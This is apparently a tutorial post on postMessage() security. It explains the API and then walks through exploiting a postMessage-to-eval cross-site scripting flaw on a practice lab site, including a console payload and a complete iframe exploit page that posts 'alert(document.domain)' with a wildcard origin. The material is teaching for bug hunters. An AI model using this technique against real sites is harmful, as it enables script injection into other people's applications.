postMessage() security
postMessage() method
This method enables communication between two pages iff they originates from same protocol , port Number. It provides secure mechanism for communication if set properly.
In communication two methods are used generally :
- postMessage() : sends data
- addEventListener() : Listen for data
Syntax
- postMessage() :
postMessage(message, targetOrigin)
postMessage(message, targetOrigin,transfer)
message => data/payload you want to send to other windows.
targetOrigin => Origin of target which will get the message if target does not match with Origin then message won’t be send, or “*” can be specify as targetOrigin which means target window can have any origin.
2. addEventListener() :
addEventListener("message",function ()=>{
//whatever contend
}, true/false)
message => data/payload send from the other window
function => tells what action will be perform when data/payload is received.
More info :
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
Where is the Bug
Firstly, to exploit postMessage bug application should use web messaging. If application is using web messaging then the listener ( addEventListener ) should be identified.
Tool to Identify listeners :
postMessage extension created by frans rosen :
Crome :
https://github.com/fransr/postMessage-tracker
Firefox [forked from fransr]:
https://github.com/sumeet-darekar/postMessage-tracker
vulnerabilities that can be found in postMessage are : XSS , Inforamation Disclosure , Authentication misconf and many more
Example : Describing Bug
https://xss-lab-brown.vercel.app/
This application is vulnerable to poseMessage() XSS, So let’s exploit it
First identify if their is any listener on application using above extension
Yes their is a addEventListener() method in javascript, lets analyse it
So, the application is taking our payload/data and putting in eval function for further analysis.As our payload/data is ending up in eval function so let’s run javascript there.
Open console by pressing ‘Esc’ button then send malicious postMessage() payload.
By using alert() we can pop-up a alert which show that we can run javascript on the application.
payload = window.postMessage('alert(document.domain)','*')
now, exploiting the vulnerability by using iframe() on replit.com
Code to exploit :
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>replit</title>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<script>
function exploit(){
payload = "alert(document.domain)"
document.getElementById("target").contentWindow.postMessage(payload, "*")
}
</script>
Hello world
<iframe src="https://xss-lab-brown.vercel.app/" id="target" onload="exploit()">
<script src="script.js"></script>
</body>
</html>
More Resources :
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
https://www.yeswehack.com/learn-bug-bounty/introduction-postmessage-vulnerabilities
https://payatu.com/blog/postmessage-vulnerabilities/
More practise labs :
https://public-firing-range.appspot.com/dom/index.html
https://github.com/payatu/vuln-nodejs-app
sayonara ^_^